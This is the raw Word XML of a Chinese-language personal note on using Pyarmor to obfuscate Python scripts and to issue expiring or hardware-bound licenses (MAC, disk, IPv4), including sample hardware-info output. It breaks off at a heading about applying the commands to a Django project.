    <w:p w14:paraId="7F78B497" w14:textId="77777777" w:rsidR="00081240" w:rsidRDefault="00081240" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77C5CD31" w14:textId="72250072" w:rsidR="001F0C21" w:rsidRPr="001F0C21" w:rsidRDefault="001F0C21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F0C21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>不要在目标设备中安装</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0C21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pyarmor </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0C21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0C21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">Python </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0C21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>解释器可以在没有</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0C21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pyarmor </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0C21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的情况下运行混淆的脚本。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78790F87" w14:textId="77777777" w:rsidR="001F0C21" w:rsidRDefault="001F0C21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17C5B57E" w14:textId="61C8773D" w:rsidR="00394E46" w:rsidRDefault="00BA4171" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00502414">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>pyarmor g foo.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724D8820" w14:textId="4F17F26F" w:rsidR="00BA4171" w:rsidRDefault="00BA4171" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也可以写成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA4171">
        <w:t>generate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> gen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073B72B8" w14:textId="77777777" w:rsidR="00BA4171" w:rsidRDefault="00BA4171" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04F48271" w14:textId="46CF469E" w:rsidR="00E10177" w:rsidRDefault="00E10177" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dist</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下生成</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3641066E" w14:textId="77777777" w:rsidR="00E10177" w:rsidRDefault="00E10177" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>foo.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7F87C9" w14:textId="610D4240" w:rsidR="00BA4171" w:rsidRDefault="00E10177" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>pyarmor_runtime_000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629A20CB" w14:textId="77777777" w:rsidR="00BA4171" w:rsidRDefault="00BA4171" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EF82C68" w14:textId="6644AD54" w:rsidR="00BA4171" w:rsidRDefault="00E10177" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两个文件均经过混淆</w:t>
      </w:r>
      <w:r w:rsidR="009403D9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。赋值时，不能仅复制同名函数过去，而应该复制整个</w:t>
      </w:r>
      <w:r w:rsidR="009403D9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dist</w:t>
      </w:r>
      <w:r w:rsidR="009403D9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录过去。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC3F7C3" w14:textId="77777777" w:rsidR="00E10177" w:rsidRDefault="00E10177" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1712B991" w14:textId="09874879" w:rsidR="00502414" w:rsidRDefault="00502414" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00502414">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>-O</w:t>
      </w:r>
      <w:r w:rsidRPr="00502414">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>用于设置</w:t>
      </w:r>
      <w:r w:rsidRPr="00502414">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>dist2</w:t>
      </w:r>
      <w:r w:rsidRPr="00502414">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>与默认不同的输出路径：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7889A467" w14:textId="44659EBB" w:rsidR="00E10177" w:rsidRDefault="00502414" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>pyarmor gen -O dist2 src/mypkg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1BC7E4" w14:textId="77777777" w:rsidR="00E10177" w:rsidRDefault="00E10177" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D1B041F" w14:textId="77777777" w:rsidR="00BA4171" w:rsidRDefault="00BA4171" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03536DF3" w14:textId="77777777" w:rsidR="00202D61" w:rsidRDefault="00202D61" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32ADAF69" w14:textId="77777777" w:rsidR="00202D61" w:rsidRDefault="00202D61" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>简易命令：某教程给出的命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2F2876" w14:textId="77777777" w:rsidR="00202D61" w:rsidRPr="00394E46" w:rsidRDefault="00202D61" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>另一个参考链接的简单教程：</w:t>
      </w:r>
      <w:r w:rsidRPr="00394E46">
        <w:t>https://blog.csdn.net/muyao987/article/details/126488384</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71074F20" w14:textId="77777777" w:rsidR="00202D61" w:rsidRDefault="00202D61" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CDD3255" w14:textId="4648F48B" w:rsidR="00356D4E" w:rsidRDefault="00356D4E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>混淆代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A759CB" w14:textId="370F9153" w:rsidR="00202D61" w:rsidRDefault="00356D4E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00356D4E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>pyarmor obfuscate server.py</w:t>
      </w:r>
      <w:r w:rsidRPr="00356D4E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，就会把</w:t>
      </w:r>
      <w:r w:rsidRPr="00356D4E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> server.py </w:t>
      </w:r>
      <w:r w:rsidRPr="00356D4E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作为入口函数且将同目录下的</w:t>
      </w:r>
      <w:r w:rsidRPr="00356D4E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> py </w:t>
      </w:r>
      <w:r w:rsidRPr="00356D4E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件加密到</w:t>
      </w:r>
      <w:r w:rsidRPr="00356D4E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ./dist </w:t>
      </w:r>
      <w:r w:rsidRPr="00356D4E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件夹中（如果递归加密子目录下</w:t>
      </w:r>
      <w:r w:rsidRPr="00356D4E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r w:rsidRPr="00356D4E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件可执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00356D4E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> pyarmor obfuscate --recursive server.py </w:t>
      </w:r>
      <w:r w:rsidRPr="00356D4E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF07319" w14:textId="77777777" w:rsidR="00202D61" w:rsidRDefault="00202D61" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E596D9A" w14:textId="6D762A87" w:rsidR="00356D4E" w:rsidRDefault="00356D4E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>license</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置过期时间，可以绑定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>disk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C19A479" w14:textId="0CC1BF66" w:rsidR="00356D4E" w:rsidRDefault="00356D4E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00356D4E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置过期时间：执行代码</w:t>
      </w:r>
      <w:r w:rsidRPr="00356D4E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00904C9F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>pyarmor licenses --expired 2022-01-01 r001</w:t>
      </w:r>
      <w:r w:rsidRPr="00356D4E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，则在</w:t>
      </w:r>
      <w:r w:rsidRPr="00356D4E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dist</w:t>
      </w:r>
      <w:r w:rsidRPr="00356D4E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同级的当前目录生成</w:t>
      </w:r>
      <w:r w:rsidRPr="00356D4E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> licenses </w:t>
      </w:r>
      <w:r w:rsidRPr="00356D4E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件夹：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67746755" w14:textId="77777777" w:rsidR="00356D4E" w:rsidRDefault="00356D4E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46361AB1" w14:textId="77777777" w:rsidR="00356D4E" w:rsidRDefault="00356D4E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此外，如果要绑定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mac</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址或者硬盘，可以执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00904C9F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>pyarmor hdinfo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看硬件信息，然后执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00904C9F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>pyarmor licenses --bind-disk "xxxxxx" --bind-mac "xx:xx:xx:xx:xx:xx" r002</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成证书。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AACE9F" w14:textId="77777777" w:rsidR="00356D4E" w:rsidRDefault="00356D4E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="476650A1" w14:textId="6F878799" w:rsidR="00356D4E" w:rsidRPr="00202D61" w:rsidRDefault="00356D4E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成证书后，带上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> licenses </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行加密命令：</w:t>
      </w:r>
      <w:r w:rsidRPr="00904C9F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>pyarmor obfuscate --with-license licenses/r001/license.lic server.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，生成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> dist </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> cd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进去再执行，如果时间过期了（或硬件不对），就会报错（此时即使删掉</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> licenses </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件夹也没啥用）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EF671C" w14:textId="051F9FE5" w:rsidR="00202D61" w:rsidRDefault="00DE3B32" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>绑定网卡磁盘信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42786953" w14:textId="77777777" w:rsidR="005C03C9" w:rsidRDefault="005C03C9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>C:\Users\ranja&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005C03C9">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>python3 -m pyarmor.cli.hdinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206D7CEE" w14:textId="77777777" w:rsidR="005C03C9" w:rsidRDefault="005C03C9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Machine ID: 'm7ad01780566c0eb96dc88e973754f249'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235E7FE5" w14:textId="77777777" w:rsidR="005C03C9" w:rsidRDefault="005C03C9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Default Harddisk Serial Number: failed to get hardware information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5D27F7" w14:textId="77777777" w:rsidR="005C03C9" w:rsidRDefault="005C03C9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Default Mac address: '00:0c:29:22:65:4d'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD31C47" w14:textId="77777777" w:rsidR="005C03C9" w:rsidRDefault="005C03C9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Default IPv4 address: '192.168.43.158'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6301EF1B" w14:textId="20F098DA" w:rsidR="00DE3B32" w:rsidRDefault="005C03C9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Multiple Mac addresses: Unsupported hardware type with name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF3A1D4" w14:textId="77777777" w:rsidR="00DE3B32" w:rsidRDefault="00DE3B32" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C42439D" w14:textId="303517B7" w:rsidR="00DE3B32" w:rsidRDefault="00D148D5" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r>
        <w:t>v4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD95B0A" w14:textId="77777777" w:rsidR="00D148D5" w:rsidRDefault="00D148D5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>pyarmor gen -O dist5 -b 128.16.4.10 foo.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673D6599" w14:textId="108654FE" w:rsidR="00D148D5" w:rsidRPr="00D148D5" w:rsidRDefault="00D148D5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>pyarmor gen -O dist5 -b HXS2000CN2A foo.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A415D4E" w14:textId="6CF960CC" w:rsidR="00D148D5" w:rsidRDefault="00D148D5" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A30FF5E" w14:textId="77777777" w:rsidR="00D148D5" w:rsidRDefault="00D148D5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56BCC5C5" w14:textId="45500048" w:rsidR="00D148D5" w:rsidRPr="00D148D5" w:rsidRDefault="003417A6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003417A6">
        <w:t>pyarmor gen -O dist5 -b 00:16:3e:35:19:3d foo.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5D8C8C" w14:textId="77777777" w:rsidR="00D148D5" w:rsidRDefault="00D148D5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F9F63E8" w14:textId="05480777" w:rsidR="00D148D5" w:rsidRDefault="003417A6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003417A6">
        <w:t>pyarmor gen -O dist5 -b "00:16:3e:35:19:3d HXS2000CN2A" foo.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75702D15" w14:textId="77777777" w:rsidR="00D148D5" w:rsidRDefault="00D148D5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FA09A04" w14:textId="77777777" w:rsidR="00D148D5" w:rsidRDefault="00D148D5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F050FE3" w14:textId="77777777" w:rsidR="00D148D5" w:rsidRDefault="00D148D5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2395A342" w14:textId="77777777" w:rsidR="00D148D5" w:rsidRPr="00DE3B32" w:rsidRDefault="00D148D5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23AC0489" w14:textId="1CB1F12A" w:rsidR="00BA4171" w:rsidRDefault="00594C01" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实战命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BA9AD4" w14:textId="6820D46A" w:rsidR="00594C01" w:rsidRDefault="0011704F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实际测试，必须切进去。我的话没加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>r -i</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364290C6" w14:textId="6A19DAA6" w:rsidR="00594C01" w:rsidRDefault="006466A3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0011704F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>进入</w:t>
      </w:r>
      <w:r w:rsidRPr="0011704F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>django</w:t>
      </w:r>
      <w:r w:rsidRPr="0011704F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>项目的</w:t>
      </w:r>
      <w:r w:rsidRPr="0011704F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>manage.</w:t>
      </w:r>
      <w:r w:rsidRPr="0011704F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">py </w:t>
      </w:r>
      <w:r w:rsidRPr="0011704F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的目录中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，运行命令：</w:t>
      </w:r>
